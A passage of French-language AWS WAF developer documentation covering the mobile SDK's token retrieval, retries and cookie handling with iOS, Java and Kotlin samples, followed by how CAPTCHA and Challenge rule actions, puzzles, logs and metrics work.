### Comment le fournisseur de jetons tente à nouveau de récupérer un jeton qui a échoué
<a name="waf-mobile-sdk-how-token-retrieval-retries"></a>

Le fournisseur de jetons réessaie automatiquement de récupérer le jeton en cas d'échec de la récupération. Les nouvelles tentatives sont initialement effectuées à l'aide d'une temporisation exponentielle avec un temps d'attente de départ de 100 ms. Pour plus d'informations sur les tentatives exponentielles, reportez-vous à la section [Rétentatives d'erreur et recul exponentiel](https://docs.aws.amazon.com/general/latest/gr/api-retries.html) dans. AWS

Lorsque le nombre de tentatives atteint le nombre configuré`maxRetryCount`, le fournisseur de jetons arrête d'essayer ou passe à essayer toutes les `maxErrorTokenRefreshDelayMsec` millisecondes, selon le type de récupération du jeton : 
+ **`onTokenReady()`**— Le fournisseur de jetons passe à l'attente de quelques `maxErrorTokenRefreshDelayMsec` millisecondes entre les tentatives et continue d'essayer de récupérer le jeton. 
+ **Actualisation en arrière-plan** : le fournisseur de jetons passe à l'attente de quelques `maxErrorTokenRefreshDelayMsec` millisecondes entre les tentatives et continue d'essayer de récupérer le jeton. 
+ **`getToken()`Appels à la demande, lorsque l'actualisation en arrière-plan est désactivée** : le fournisseur de jetons arrête d'essayer de récupérer un jeton et renvoie la valeur du jeton précédent, ou une valeur nulle s'il n'existe aucun jeton précédent. 

## Scénarios de nouvelle tentative de récupération de jetons
<a name="waf-mobile-sdk-how-token-retrieval-retry-scenarios"></a>

Lorsque le fournisseur de jetons essaie de récupérer un jeton, cela peut entraîner de nouvelles tentatives automatiques en fonction de l'endroit où la récupération du jeton échoue dans le flux d'acquisition de jetons. Cette section répertorie les endroits où une nouvelle tentative automatique est susceptible de s'afficher.
+ **Obtenir ou vérifier le AWS WAF défi via /inputs ou /verify :**
  + Lorsqu'une demande d'obtention et de vérification d'un AWS WAF défi est faite et échoue, cela peut entraîner une nouvelle tentative automatique.
  + Il se peut que vous observiez de nouvelles tentatives automatiques accompagnées d'une `socketTimeoutException` erreur. Cela peut avoir plusieurs causes, notamment :
    + Faible bande passante réseau : confirmez vos paramètres de connectivité réseau
    + URL d'intégration de l'application modifiée : vérifiez que l'URL d'intégration n'est pas modifiée par rapport à ce qui apparaît sur la console AWS WAF 
  + Le nombre de tentatives automatiques est configurable avec la fonction `maxRetryCount()`
+ **Actualisation du jeton :**
  + Lorsqu'une demande d'actualisation du jeton est faite via le gestionnaire de jetons, cela peut entraîner une nouvelle tentative automatique.
  + Le nombre de tentatives automatiques ici est configurable avec la `maxRetryCount()` fonction.

Une configuration sans nouvelles tentatives automatiques est possible en configurant. `maxRetryCount(0)`

## Durée d'immunité des jetons et actualisation de l'arrière-plan
<a name="waf-mobile-sdk-how-token-immunity"></a>

La durée d'immunité des jetons que vous configurez dans l'ACL Web est indépendante de l'intervalle d'actualisation des jetons que vous avez défini dans le SDK AWS WAF mobile. Lorsque vous activez l'actualisation en arrière-plan, le SDK actualise le jeton à l'intervalle que vous spécifiez. `tokenRefreshDelaySec()` Cela peut entraîner l'existence simultanée de plusieurs jetons valides, en fonction de la durée d'immunité que vous avez configurée.

Pour empêcher la validité de plusieurs jetons, vous pouvez désactiver l'actualisation en arrière-plan et utiliser cette `getToken()` fonction pour gérer le cycle de vie des jetons dans votre application mobile.

## Récupération d'un jeton suite à l'inactivité d'une application
<a name="waf-mobile-sdk-how-back-from-inactive"></a>

L'actualisation en arrière-plan n'est effectuée que lorsque votre application est considérée comme active pour votre type d'application : 
+ **iOS** — L'actualisation de l'arrière-plan est effectuée lorsque l'application est au premier plan.
+ **Android** — L'actualisation de l'arrière-plan est effectuée lorsque l'application n'est pas fermée, qu'elle soit au premier plan ou en arrière-plan.

Si votre application reste dans un état qui ne prend pas en charge l'actualisation en arrière-plan pendant plus de `tokenRefreshDelaySec` quelques secondes que vous avez configurées, le fournisseur de jetons interrompt l'actualisation en arrière-plan. Par exemple, pour une application iOS, si la valeur `tokenRefreshDelaySec` est 300 et que l'application se ferme ou passe en arrière-plan pendant plus de 300 secondes, le fournisseur de jetons arrête d'actualiser le jeton. Lorsque l'application revient à un état actif, le fournisseur de jetons redémarre automatiquement l'actualisation en arrière-plan. 

Lorsque votre application revient à un état actif, appelez `onTokenReady()` pour être averti lorsque le fournisseur de jetons a récupéré et mis en cache un nouveau jeton. Ne vous contentez pas d'appeler`getToken()`, car le cache ne contient peut-être pas encore de jeton valide et actuel. 

## URL d'intégration de l'application
<a name="waf-mobile-sdk-application-integration-url"></a>

L'URL d'intégration de l'application du SDK AWS WAF mobile pointe vers une ACL Web que vous avez activée pour l'intégration des applications. Cette URL achemine les demandes vers le serveur principal approprié et les associe à votre client. Il ne s'agit pas d'un contrôle de sécurité strict. L'exposition d'une URL d'intégration ne présente donc aucun risque de sécurité.

Vous pouvez modifier techniquement l'URL d'intégration fournie tout en obtenant un jeton. Toutefois, nous ne le recommandons pas, car vous risquez de perdre de la visibilité sur les taux de résolution des problèmes ou de rencontrer des échecs de récupération de jetons accompagnés d'`socketTimeoutException`erreurs.

## Dépendances
<a name="waf-mobile-sdk-dependencies"></a>

Chaque SDK AWS WAF mobile téléchargeable inclut un fichier README répertoriant les dépendances de sa version spécifique du SDK. Reportez-vous au fichier README pour connaître les dépendances de votre version du SDK mobile.

## Obfuscation/ ProGuard (SDK Android uniquement)
<a name="waf-mobile-sdk-obfuscation"></a>

Si vous utilisez un produit d'obfuscation ou de minification tel que ProGuard, vous devrez peut-être exclure certains espaces de noms pour garantir le bon fonctionnement du SDK mobile. Consultez le fichier README correspondant à votre version du SDK mobile pour trouver la liste des espaces de noms et des règles d'exclusion.

# Exemples de code pour le SDK AWS WAF mobile
<a name="waf-mobile-sdk-coding-examples"></a>

Cette section fournit des exemples de code pour l'utilisation du SDK mobile. 

## Initialisation du fournisseur de jetons et obtention de jetons
<a name="waf-mobile-sdk-coding-basic"></a>

Vous lancez votre instance de fournisseur de jetons à l'aide d'un objet de configuration. Vous pouvez ensuite récupérer des jetons en utilisant les opérations disponibles. Les éléments de base du code requis sont présentés ci-dessous.

------
#### [ iOS ]

```
let url: URL = URL(string: "protection pack (web ACL) integration URL")!
let configuration = WAFConfiguration(applicationIntegrationUrl: url, domainName: "Domain name")
let tokenProvider = WAFTokenProvider(configuration)

//onTokenReady can be add as an observer for UIApplication.willEnterForegroundNotification
self.tokenProvider.onTokenReady() { token, error in
	if let token = token {
	//token available
	}

	if let error = error {
	//error occurred after exhausting all retries
	}
}

//getToken()
let token = tokenProvider.getToken()
```

------
#### [ Android ]

Exemple Java :

```
String applicationIntegrationURL = "protection pack (web ACL) integration URL";
//Or
URL applicationIntegrationURL = new URL("protection pack (web ACL) integration URL");

String domainName = "Domain name";

WAFConfiguration configuration = WAFConfiguration.builder().applicationIntegrationURL(applicationIntegrationURL).domainName(domainName).build();
WAFTokenProvider tokenProvider = new WAFTokenProvider(Application context, configuration);

// implement a token result callback
WAFTokenResultCallback callback = (wafToken, error) -> {
	if (wafToken != null) {
	// token available
	} else {  
	// error occurred in token refresh  
	}
};

// Add this callback to application creation or activity creation where token will be used
tokenProvider.onTokenReady(callback);

// Once you have token in token result callback
// if background refresh is enabled you can call getToken() from same tokenprovider object
// if background refresh is disabled you can directly call getToken()(blocking call) for new token
WAFToken token = tokenProvider.getToken();
```

Exemple en Kotlin :

```
import com.amazonaws.waf.mobilesdk.token.WAFConfiguration
import com.amazonaws.waf.mobilesdk.token.WAFTokenProvider

private lateinit var wafConfiguration: WAFConfiguration
private lateinit var wafTokenProvider: WAFTokenProvider

private val WAF_INTEGRATION_URL = "protection pack (web ACL) integration URL"
private val WAF_DOMAIN_NAME = "Domain name"

fun initWaf() {
	// Initialize the tokenprovider instance
	val applicationIntegrationURL = URL(WAF_INTEGRATION_URL)
	wafConfiguration =
		WAFConfiguration.builder().applicationIntegrationURL(applicationIntegrationURL)
			.domainName(WAF_DOMAIN_NAME).backgroundRefreshEnabled(true).build()
	wafTokenProvider = WAFTokenProvider(getApplication(), wafConfiguration)
	
		// getToken from tokenprovider object
		println("WAF: "+ wafTokenProvider.token.value)
	
		// implement callback for where token will be used
		wafTokenProvider.onTokenReady {
			wafToken, sdkError ->
		run {
			println("WAF Token:" + wafToken.value)
		}
	}
}
```

------

## Autoriser le SDK à fournir le cookie jeton dans vos requêtes HTTP
<a name="waf-mobile-sdk-coding-auto-token-cookie"></a>

Si `setTokenCookie` tel est le cas`TRUE`, le fournisseur de jetons inclut le cookie jeton pour vous dans vos requêtes Web adressées à tous les emplacements situés sous le chemin spécifié dans`tokenCookiePath`. Par défaut, `setTokenCookie` est `TRUE` et `tokenCookiePath` est`/`. 

Vous pouvez réduire la portée des demandes qui incluent un cookie jeton en spécifiant le chemin du cookie jeton, par exemple,`/web/login`. Dans ce cas, vérifiez que vos AWS WAF règles ne détectent pas la présence de jetons dans les demandes que vous envoyez à d'autres chemins. Lorsque vous utilisez le groupe de `AWSManagedRulesACFPRuleSet` règles, vous configurez les chemins d'enregistrement et de création du compte, et le groupe de règles vérifie la présence de jetons dans les demandes envoyées à ces chemins. Pour de plus amples informations, veuillez consulter [Ajouter le groupe de règles géré par l'ACFP à votre ACL Web](waf-acfp-rg-using.md). De même, lorsque vous utilisez le groupe de `AWSManagedRulesATPRuleSet` règles, vous configurez le chemin de connexion, et le groupe de règles vérifie la présence de jetons dans les demandes envoyées vers ce chemin. Pour de plus amples informations, veuillez consulter [Ajouter le groupe de règles géré par ATP à votre pack de protection (ACL Web)](waf-atp-rg-using.md). 

------
#### [ iOS ]

Dans `setTokenCookie` ce cas`TRUE`, le fournisseur de jetons stocke le AWS WAF jeton dans un `HTTPCookieStorage.shared` et inclut automatiquement le cookie dans les demandes adressées au domaine que vous avez spécifié`WAFConfiguration`.

```
let request = URLRequest(url: URL(string: domainEndpointUrl)!)
//The token cookie is set automatically as cookie header
let task = URLSession.shared.dataTask(with: request) { data, urlResponse, error  in
}.resume()
```

------
#### [ Android ]

Dans `setTokenCookie` ce cas`TRUE`, le fournisseur de jetons stocke le AWS WAF jeton dans une `CookieHandler` instance partagée à l'échelle de l'application. Le fournisseur de jetons inclut automatiquement le cookie dans les demandes adressées au domaine que vous avez spécifié`WAFConfiguration`.

Exemple Java :

```
URL url = new URL("Domain name");
//The token cookie is set automatically as cookie header
HttpsURLConnection connection = (HttpsURLConnection) url.openConnection();
connection.getResponseCode();
```

Exemple en Kotlin :

```
val url = URL("Domain name")
//The token cookie is set automatically as cookie header
val connection = (url.openConnection() as HttpsURLConnection)
connection.responseCode
```

Si l'instance `CookieHandler` par défaut est déjà initialisée, le fournisseur de jetons l'utilisera pour gérer les cookies. Dans le cas contraire, le fournisseur de jetons initialisera une nouvelle `CookieManager` instance avec le AWS WAF jeton, `CookiePolicy.ACCEPT_ORIGINAL_SERVER` puis définira cette nouvelle instance comme instance par défaut dans`CookieHandler`.

Le code suivant montre comment le SDK initialise le gestionnaire de cookies et le gestionnaire de cookies lorsqu'ils ne sont pas disponibles dans votre application. 

Exemple Java :

```
CookieManager cookieManager = (CookieManager) CookieHandler.getDefault();
if (cookieManager == null) {
	// Cookie manager is initialized with CookiePolicy.ACCEPT_ORIGINAL_SERVER
	cookieManager = new CookieManager();
	CookieHandler.setDefault(cookieManager);
}
```

Exemple en Kotlin :

```
var cookieManager = CookieHandler.getDefault() as? CookieManager
if (cookieManager == null) {
	// Cookie manager is initialized with CookiePolicy.ACCEPT_ORIGINAL_SERVER
	cookieManager = CookieManager()
	CookieHandler.setDefault(cookieManager)
}
```

------

## Fournir manuellement le cookie jeton dans vos requêtes HTTP
<a name="waf-mobile-sdk-coding-manual-token-cookie"></a>

Si vous définissez cette `setTokenCookie` option`FALSE`, vous devez fournir le cookie jeton manuellement, sous forme d'en-tête de requête HTTP Cookie, dans vos demandes adressées à votre point de terminaison protégé. Le code suivant montre comment procéder.

------
#### [ iOS ]

```
var request = URLRequest(url: wafProtectedEndpoint)
request.setValue("aws-waf-token=token from token provider", forHTTPHeaderField: "Cookie")
request.httpShouldHandleCookies = true
URLSession.shared.dataTask(with: request) { data, response, error in }
```

------
#### [ Android ]

Exemple Java :

```
URL url = new URL("Domain name");
HttpsURLConnection connection = (HttpsURLConnection) url.openConnection();
String wafTokenCookie = "aws-waf-token=token from token provider";
connection.setRequestProperty("Cookie", wafTokenCookie);
connection.getInputStream();
```

Exemple en Kotlin :

```
val url = URL("Domain name")
val connection = (url.openConnection() as HttpsURLConnection)
val wafTokenCookie = "aws-waf-token=token from token provider"
connection.setRequestProperty("Cookie", wafTokenCookie)
connection.inputStream
```

------

# CAPTCHAet Challenge dans AWS WAF
<a name="waf-captcha-and-challenge"></a>

Cette section explique comment CAPTCHA et comment Challenge travailler avec AWS WAF.

Vous pouvez configurer vos AWS WAF règles pour exécuter une Challenge action CAPTCHA ou une action contre les requêtes Web qui répondent aux critères d'inspection de votre règle. Vous pouvez également programmer vos applications JavaScript clientes pour exécuter des puzzles CAPTCHA et des défis de navigateur localement. 

Les puzzles CAPTCHA et les défis silencieux ne peuvent être exécutés que lorsque les navigateurs accèdent à des points de terminaison HTTPS. Les clients du navigateur doivent fonctionner dans des contextes sécurisés pour acquérir des jetons. 
+ **CAPTCHA**— Demande à l'utilisateur final de résoudre un casse-tête CAPTCHA pour prouver que c'est un être humain qui envoie la demande. Les puzzles CAPTCHA sont conçus pour être assez faciles et rapides à compléter avec succès pour les humains et difficiles pour les ordinateurs à les terminer avec succès ou au hasard avec un taux de réussite significatif. 

  Dans les règles du pack de protection (ACL Web), le CAPTCHA est couramment utilisé lorsqu'une Block action arrête un trop grand nombre de demandes légitimes, mais que le fait de laisser passer tout le trafic entraîne des niveaux inacceptables de demandes indésirables, provenant par exemple de robots. Pour plus d'informations sur le comportement des actions des règles, consultez[Comment fonctionnent les actions AWS WAF CAPTCHA et les Challenge règles](waf-captcha-and-challenge-how-it-works.md).

  Vous pouvez également programmer une implémentation de casse-tête CAPTCHA dans l'intégration de votre application client. APIs Vous pouvez ainsi personnaliser le comportement et le placement du puzzle dans votre application cliente. Pour de plus amples informations, veuillez consulter [Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). 
+ **Challenge**— Lance un défi silencieux qui demande à la session client de vérifier qu'il s'agit d'un navigateur et non d'un bot. La vérification s'exécute en arrière-plan sans impliquer l'utilisateur final. Il s'agit d'une bonne option pour vérifier les clients que vous soupçonnez d'être invalides sans nuire à l'expérience de l'utilisateur final avec un casse-tête CAPTCHA. Pour plus d'informations sur le comportement des actions des règles, consultez[Comment fonctionnent les actions AWS WAF CAPTCHA et les Challenge règles](waf-captcha-and-challenge-how-it-works.md).

  L'action de la Challenge règle est similaire au défi lancé par l'intégration intelligente des menaces du client APIs, décrit à l'adresse[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md).

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez l'action CAPTCHA ou la Challenge règle dans l'une de vos règles ou en tant que dérogation d'action de règle dans un groupe de règles. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

Pour une description de toutes les options d'action des règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md). 

**Topics**
+ [AWS WAF Puzzles CAPTCHA](waf-captcha-puzzle.md)
+ [Comment fonctionnent les actions AWS WAF CAPTCHA et les Challenge règles](waf-captcha-and-challenge-how-it-works.md)
+ [Bonnes pratiques d'utilisation des Challenge actions CAPTCHA et](waf-captcha-and-challenge-best-practices.md)

# AWS WAF Puzzles CAPTCHA
<a name="waf-captcha-puzzle"></a>

Cette section explique les caractéristiques et les fonctionnalités du puzzle AWS WAF CAPTCHA.

AWS WAF fournit une fonctionnalité CAPTCHA standard qui met les utilisateurs au défi de confirmer qu'ils sont des êtres humains. CAPTCHA est l'abréviation de Completely Automated Public Turing Test pour différencier les ordinateurs des humains. Les casse-têtes CAPTCHA sont conçus pour vérifier qu'un humain envoie des demandes et pour empêcher des activités telles que le scraping Web, le bourrage d'informations d'identification et le spam. Les puzzles CAPTCHA ne peuvent pas éliminer toutes les demandes indésirables. De nombreuses énigmes ont été résolues grâce à l'apprentissage automatique et à l'intelligence artificielle. Dans le but de contourner le CAPTCHA, certaines organisations complètent les techniques automatisées par une intervention humaine. Malgré cela, le CAPTCHA continue d'être un outil utile pour empêcher le trafic de bots moins sophistiqué et pour augmenter les ressources requises pour les opérations à grande échelle. 

AWS WAF génère aléatoirement ses puzzles CAPTCHA et les fait pivoter pour s'assurer que les utilisateurs sont confrontés à des défis uniques. AWS WAF ajoute régulièrement de nouveaux types et styles de puzzles pour rester efficace contre les techniques d'automatisation. Outre les énigmes, le script AWS WAF CAPTCHA collecte des données sur le client pour s'assurer que la tâche est exécutée par un humain et pour empêcher les attaques en replay. 

Chaque casse-tête CAPTCHA comprend un ensemble standard de commandes permettant à l'utilisateur final de demander un nouveau puzzle, de passer d'un puzzle audio à un puzzle visuel, d'accéder à des instructions supplémentaires et de soumettre une solution de puzzle. Tous les puzzles incluent la prise en charge des lecteurs d'écran, des commandes du clavier et des couleurs contrastées. 

Les puzzles AWS WAF CAPTCHA répondent aux exigences des Règles pour l'accessibilité des contenus Web (WCAG). Pour plus d'informations, consultez la [présentation des règles pour l'accessibilité des contenus Web (WCAG) sur](https://www.w3.org/WAI/standards-guidelines/wcag/) le site Web du World Wide Web Consortium (W3C).

**Topics**
+ [Support du langage de puzzle CAPTCHA](waf-captcha-puzzle-language-support.md)
+ [Exemples de casse-têtes CAPTCHA](waf-captcha-puzzle-examples.md)

# Support du langage de puzzle CAPTCHA
<a name="waf-captcha-puzzle-language-support"></a>

Cette section répertorie les langues prises en charge dans les puzzles AWS WAF CAPTCHA.

Le casse-tête CAPTCHA commence par des instructions écrites dans la langue du navigateur client ou, si la langue du navigateur n'est pas prise en charge, en anglais. Le puzzle propose des options de langue alternatives via un menu déroulant.

L'utilisateur peut passer aux instructions audio en sélectionnant l'icône du casque au bas de la page. La version audio du puzzle fournit des instructions vocales sur le texte que l'utilisateur doit taper dans une zone de texte, recouvert d'un bruit de fond. 

Le tableau suivant répertorie les langues que vous pouvez sélectionner pour les instructions écrites d'un casse-tête CAPTCHA et le support audio pour chaque sélection. 


**AWS WAF Langues prises en charge par les puzzles CAPTCHA**  

| Support des instructions écrites | Code local | Support des instructions audio | 
| --- | --- | --- | 
|  Arabe  |  ar-SA  |  Arabe  | 
|  Chinois (simplifié)  |  zh-CN  |  Audio en anglais  | 
|  Néerlandais  |  nl-NL  |  Néerlandais  | 
|  Anglais  |  en-US  |  Anglais  | 
|  Français  |  fr-FR  |  Français  | 
|  Allemand  |  de-DE  |  Allemand  | 
|  Italien  |  it-IT  |  Italien  | 
|  Japonais  |  ja-JP  |  Audio en anglais  | 
|  Portugais brésilien  |  pt-BR  |  Portugais brésilien  | 
|  Espagnol  |  es-ES  |  Espagnol  | 
|  Turc  |  tr-TR  |  Turc  | 

# Exemples de casse-têtes CAPTCHA
<a name="waf-captcha-puzzle-examples"></a>

Un casse-tête CAPTCHA visuel typique nécessite une interaction pour montrer que l'utilisateur peut comprendre et interagir avec une ou plusieurs images. 

La capture d'écran suivante montre un exemple de puzzle en grille d'images. Ce casse-tête vous oblige à sélectionner toutes les images de la grille qui incluent un type d'objet spécifique. 

![\[Un écran contient le titre « Confirmons que vous êtes un être humain » et le texte « Choisissez toutes les chaises ». Sous le texte se trouve une grille d'images 3 x 3, dont certaines contiennent des chaises et d'autres des objets autres que des chaises, tels que des lits et des fenêtres. Au bas de l'écran se trouvent des options permettant de charger un autre puzzle, d'afficher ou de désactiver la boîte d'informations, de passer à un puzzle audio et de changer de langue. En bas se trouve également le bouton « Confirmer ».\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/CAPTCHAPuzzleGrid.png)


Un puzzle audio produit un bruit de fond recouvert d'instructions vocales concernant le texte que l'utilisateur doit taper dans une zone de texte.

La capture d'écran suivante montre l'affichage du choix du puzzle audio. 

![\[Un écran contient le titre « Résolvez le puzzle » et le texte « Cliquez sur jouer pour écouter les instructions ». Sous le texte se trouve une image qui montre un bouton Play. Sous l'image se trouve le texte « Bascule audio du clavier : alt + espace ». Vous trouverez ci-dessous le titre « Entrez votre réponse » avec une zone de saisie de texte en dessous. Une boîte d'information ouverte contient le texte « Résolvez en écoutant l'enregistrement et en tapant votre réponse dans la zone de texte ». Au bas de l'écran se trouvent des options permettant de charger un autre puzzle, d'afficher ou de masquer la boîte d'informations et de passer à un puzzle visuel. En bas se trouve également le bouton « Soumettre ».\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/CAPTCHAPuzzleAudio.png)




# Comment fonctionnent les actions AWS WAF CAPTCHA et les Challenge règles
<a name="waf-captcha-and-challenge-how-it-works"></a>

Cette section explique comment CAPTCHA et comment Challenge procéder.

AWS WAF CAPTCHAet Challenge sont des actions de règles standard, elles sont donc relativement faciles à mettre en œuvre. Pour utiliser l'un ou l'autre, vous devez créer les critères d'inspection de votre règle qui identifient les demandes que vous souhaitez inspecter, puis vous spécifiez l'une des deux actions de règle. Pour des informations générales sur les options d'action des règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md).

En plus de mettre en œuvre des défis silencieux et des puzzles CAPTCHA côté serveur, vous pouvez intégrer des défis silencieux dans vos applications clientes JavaScript iOS et Android, et vous pouvez créer des puzzles CAPTCHA chez vos clients. JavaScript Ces intégrations vous permettent de fournir à vos utilisateurs finaux de meilleures performances et de meilleures expériences en matière de casse-tête CAPTCHA, et elles peuvent réduire les coûts associés à l'utilisation des actions de règles et des groupes de règles d'atténuation intelligente des menaces. Pour plus d’informations sur ces options, consultez [Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). Pour de plus amples informations sur la tarification, veuillez consulter [AWS WAF Pricing](https://aws.amazon.com/waf/pricing/) (français non garanti).

**Topics**
+ [CAPTCHAet comportement Challenge d'action](waf-captcha-and-challenge-actions.md)
+ [CAPTCHAet Challenge actions dans les journaux et les métriques](waf-captcha-and-challenge-logs-metrics.md)

# CAPTCHAet comportement Challenge d'action
<a name="waf-captcha-and-challenge-actions"></a>

Cette section explique à quoi servent les Challenge actions CAPTCHA et.

Lorsqu'une requête Web correspond aux critères d'inspection d'une règle CAPTCHA ou d'une Challenge action, AWS WAF détermine comment traiter la demande en fonction de l'état de son jeton et de la configuration du temps d'immunité. AWS WAF détermine également si la demande peut gérer le casse-tête CAPTCHA ou les interstitiels du script de défi. Les scripts sont conçus pour être traités comme du contenu HTML, et ils ne peuvent être gérés correctement que par un client qui attend du contenu HTML. 

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez l'action CAPTCHA ou la Challenge règle dans l'une de vos règles ou en tant que dérogation d'action de règle dans un groupe de règles. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

**Comment l'action gère la requête Web**  
AWS WAF applique l'Challengeaction CAPTCHA ou à une requête Web comme suit :
+ **Jeton valide** : AWS WAF gère cela de la même manière qu'une Count action. AWS WAF applique toutes les étiquettes et personnalisations de demande que vous avez configurées pour l'action de règle, puis continue d'évaluer la demande en utilisant les règles restantes du pack de protection (ACL Web). 
+ **Jeton manquant, non valide ou expiré** : AWS WAF interrompt l'évaluation de la demande par le pack de protection (ACL Web) et l'empêche d'atteindre sa destination prévue. 

  AWS WAF génère une réponse qu'il renvoie au client, selon le type d'action de la règle : 
  + **Challenge**— AWS WAF inclut les éléments suivants dans la réponse :
    + L'en-tête `x-amzn-waf-action` avec une valeur de `challenge`.
**Note**  
Pour les applications Javascript exécutées dans le navigateur client, cet en-tête n'est disponible que dans le domaine de l'application. L'en-tête n'est pas disponible pour la récupération entre domaines. Pour plus de détails, consultez la section qui suit.
    + Le code d'état HTTP `202 Request Accepted`.
    + Si la demande contient un `Accept` en-tête dont la valeur est égale à`text/html`, la réponse inclut une JavaScript page interstitielle contenant un script de défi.
  + **CAPTCHA**— AWS WAF inclut les éléments suivants dans la réponse :
    + L'en-tête `x-amzn-waf-action` avec une valeur de `captcha`.
**Note**  
Pour les applications Javascript exécutées dans le navigateur client, cet en-tête n'est disponible que dans le domaine de l'application. L'en-tête n'est pas disponible pour la récupération entre domaines. Pour plus de détails, consultez la section qui suit.
    + Le code d'état HTTP `405 Method Not Allowed`.
    + Si la demande contient un `Accept` en-tête dont la valeur est égale à`text/html`, la réponse inclut une JavaScript page interstitielle contenant un script CAPTCHA. 

Pour configurer le délai d'expiration des jetons au niveau du pack de protection (ACL Web) ou de la règle, consultez[Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF](waf-tokens-immunity-times.md).

**Les en-têtes ne sont pas disponibles pour JavaScript les applications qui s'exécutent dans le navigateur client**  
Lorsqu'il AWS WAF répond à une demande client par un CAPTCHA ou une réponse à un défi, il n'inclut pas les en-têtes de partage de ressources entre origines (CORS). Les en-têtes CORS sont un ensemble d'en-têtes de contrôle d'accès qui indiquent au navigateur Web du client quels domaines, méthodes HTTP et en-têtes HTTP peuvent être utilisés par les applications. JavaScript Sans en-têtes CORS, les JavaScript applications exécutées dans un navigateur client n'ont pas accès aux en-têtes HTTP et ne peuvent donc pas lire l'`x-amzn-waf-action`en-tête fourni dans les CAPTCHA réponses et. Challenge 

**À quoi servent le challenge et les interstitiels CAPTCHA**  
Lorsqu'un défi interstitiel s'exécute, une fois que le client a répondu avec succès, s'il n'a pas encore de jeton, l'interstitiel en initialise un pour celui-ci. Ensuite, il met à jour le jeton avec l'horodatage de résolution du défi.

Lorsqu'un interstitiel CAPTCHA s'exécute, si le client n'a pas encore de jeton, l'interstitiel CAPTCHA invoque d'abord le script de défi pour défier le navigateur et initialiser le jeton. Ensuite, l'interstitiel exécute son casse-tête CAPTCHA. Lorsque l'utilisateur final termine le puzzle avec succès, l'interstitiel met à jour le jeton avec l'horodatage de résolution du CAPTCHA. 

Dans les deux cas, une fois que le client a répondu avec succès et que le script a mis à jour le jeton, le script soumet à nouveau la demande Web d'origine à l'aide du jeton mis à jour. 

Vous pouvez configurer le mode de AWS WAF gestion des jetons. Pour plus d'informations, consultez [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).

# CAPTCHAet Challenge actions dans les journaux et les métriques
<a name="waf-captcha-and-challenge-logs-metrics"></a>

Cette section explique comment AWS WAF gère la journalisation et les métriques pour les Challenge actions CAPTCHA et.

Les Challenge actions CAPTCHA et peuvent être non terminales, similairesCount, ou terminales. Block Le résultat dépend du fait que la demande contient un jeton valide avec un horodatage non expiré pour le type d'action. 
+ **Jeton valide** : lorsque l'action trouve un jeton valide et ne bloque pas la demande, AWS WAF capture les métriques et les journaux comme suit :
  + Incrémente les métriques pour `RequestsWithValidCaptchaToken` ou `CaptchaRequests` pour `ChallengeRequests` et`RequestsWithValidChallengeToken`. 
  + Enregistre la correspondance sous forme d'`nonTerminatingMatchingRules`entrée avec l'action de CAPTCHA ouChallenge. La liste suivante montre la section d'un journal pour ce type de correspondance avec l'CAPTCHAaction.

    ```
        "nonTerminatingMatchingRules": [
        {
          "ruleId": "captcha-rule",
          "action": "CAPTCHA",
          "ruleMatchDetails": [],
          "captchaResponse": {
            "responseCode": 0,
            "solveTimestamp": 1632420429
          }
        }
      ]
    ```
+ **Jeton manquant, non valide ou expiré** : lorsque l'action bloque la demande en raison d'un jeton manquant ou non valide, AWS WAF capture les métriques et les journaux comme suit :
  + Incrémente la métrique pour `CaptchaRequests` ou`ChallengeRequests`. 
  + Enregistre la correspondance en tant qu'`CaptchaResponse`entrée avec un code d'`405`état HTTP ou en tant qu'`ChallengeResponse`entrée avec un code d'`202`état HTTP. Le journal indique s'il manquait le jeton ou si l'horodatage de la demande avait expiré. Le journal indique également s'il s' AWS WAF agit d'une page interstitielle CAPTCHA envoyée au client ou d'un défi silencieux au navigateur du client. La liste suivante indique les sections d'un journal relatives à ce type de correspondance avec l'CAPTCHAaction.

    ```
        "terminatingRuleId": "captcha-rule",
        "terminatingRuleType": "REGULAR",
        "action": "CAPTCHA",
        "terminatingRuleMatchDetails": [],
        ...
        "responseCodeSent": 405,
        ...
        "captchaResponse": {
          "responseCode": 405,
          "solveTimestamp": 0,
          "failureReason": "TOKEN_MISSING"
        }
    ```

Pour plus d'informations sur les AWS WAF journaux, consultez[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).

Pour plus d'informations sur AWS WAF les métriques, consultez[AWS WAF métriques et dimensions](waf-metrics.md).

Pour des informations générales sur les options d'action des règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md).

**Les demandes sans jeton semblent apparaître deux fois dans les journaux et les métriques**  
Sur la [CAPTCHAet comportement Challenge d'action](waf-captcha-and-challenge-actions.md) base de la journalisation et des métriques décrites dans cette section, une demande sans jeton sera généralement représentée deux fois dans les journaux et les métriques. Cela est dû au fait que la seule demande prévue est en fait envoyée deux fois par le client.
+ La première demande, sans jeton, reçoit la journalisation et le traitement des métriques décrits ci-dessus en cas de jeton manquant, invalide ou expiré. L'Challengeaction CAPTCHA or met fin à cette première demande, puis répond au client avec un défi silencieux ou un casse-tête CAPTCHA. 
+ Le client évalue le défi ou le casse-tête et, si le navigateur du client ou l'utilisateur final répond avec succès, envoie la demande une deuxième fois avec le jeton nouvellement acquis. Cette deuxième demande reçoit la journalisation et le traitement des métriques décrits ci-dessus pour une demande avec un jeton valide. 

# Bonnes pratiques d'utilisation des Challenge actions CAPTCHA et
<a name="waf-captcha-and-challenge-best-practices"></a>

Suivez les instructions de cette section pour planifier et mettre en œuvre le AWS WAF CAPTCHA ou le challenge.

**Planifiez votre CAPTCHA et testez la mise en œuvre**  
